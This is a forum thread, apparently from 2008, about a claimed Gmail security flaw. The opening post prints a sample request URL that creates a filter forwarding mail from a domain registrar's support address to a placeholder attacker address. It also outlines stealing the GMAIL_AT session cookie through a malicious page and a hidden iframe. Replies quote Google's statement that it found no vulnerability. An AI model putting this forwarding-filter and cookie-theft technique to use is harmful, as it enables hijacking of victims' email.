Jump to content
xisto Community
shotgun

Gmail Security Flaw

Recommended Posts

When you create a filter in your Gmail account, a request is sent to Googleâs servers to be processed. The request is made in the form of a url with many variables. For security reasons, your browser doesnât display all the variables contained within the url. Using FireFox and a plugin called Live HTTP Headers, you can see exactly what variables are sent from your browser to Googleâs servers.
Here is an example of a request url sent to Google to create a filter exactly like the one in the image above. Iâve broken down the url by variable so itâs easier to read:

https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/&scc=1&ltmpl=googlemail&emr=1
?ui=2
&ik=ad7df7dc23 *Unique Account Identifier*
&at=xn3j35svndkg48yp2qgmpt99ivcqdc *Session Authorization Key*
&view=up
&act=cf
&rt=h
&zx=pjo6fg-k2ljzh&search=cf
&cf1_from=support%40godaddy.com
&cf2_emc=true&cf2_email=hacker%40hacker.com
&cf2_tr=true

Through a process of elimination you can determine the role of each variable. The two most important variables, ik & at. The ik variable is the equivalent of a username, each account has one and it never changes. Obtaining this variable is tricky but possible. Iâm not going to tell you how to do it, if you search hard enough online youâll find out how.

Obtaining the at variable on the other hand can be done by tricking a user into visiting a page that contains malicious code that subsequently steals a cookie from the user called GMAIL_AT which is the same as the at variable, just named differently. Once the cookie is stolen the malicious code creates a hidden iframe with a url containing the variables that authorize Gmail to create a filter for your account.

Cnet News

-------------
OS:Windows Vista Ultimate Sp1
MD:Asus P5N-E
CPU:2.40GHz/Intel Quad Core Q6600
RAM:Corsair Dual Channel 4GB 800Mhz
VC:XFX GeForce 9800 GTX/512MB


Share this post


Link to post
Share on other sites

This article has already been published by Brandon on Sunday, November 23rd, 2008,
here : http://www.geekcondition.com/
The geekcondition post goes further than your text, explaining what to do in order to workaround this security hole, as well as honestly giving also the official google answer which is, guess what ?

Weâve seen some speculation recently about a purported security vulnerability in Gmail and the theft of several website ownersâ domains by unauthorized third parties. At Google weâre committed to providing secure products, and we mounted an immediate investigation. Our results indicate no evidence of a Gmail vulnerabilityâŚ.

@shotgun : please read our forum rules again. Here, at Xisto, we prefer original articles.It is not forbidden to post copied text, however you must put the copied text between quotes and mention where you copied the text from.
I did this quoting job for you today, I would like you to do the quoting job by yourself next time.
Else, we could imagine that you are trying to cheat with our Credit System. And this makes the admins around here rather angry. :rolleyes:

Share this post


Link to post
Share on other sites

So does this mean that an attacker could gain unauthorized access to your account or what exactly is the problem with this security hole? Is it preventable or is Google currently investigating a patch right now?

Share this post


Link to post
Share on other sites

So does this mean that an attacker could gain unauthorized access to your account or what exactly is the problem with this security hole? Is it preventable or is Google currently investigating a patch right now?

If you read the original post, you will see that google has solved the problem and claims that there is no real security hole.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.